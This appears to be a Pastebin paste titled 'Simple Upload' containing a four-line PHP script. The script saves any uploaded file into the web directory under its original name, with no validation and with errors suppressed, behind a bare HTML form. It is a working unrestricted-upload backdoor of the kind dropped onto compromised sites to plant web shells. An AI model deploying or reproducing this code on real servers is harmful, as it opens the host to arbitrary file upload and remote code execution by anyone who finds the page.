AlexaMP

Simple Upload

Dec 3rd, 2019
460
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.24 KB | None | 0 0
  1. <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
  2. <h1> shu </h1></p>
  3. <br> <form action="" method="post" enctype="multipart/form-data">
  4. Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
Add Comment
Please, Sign In to add comment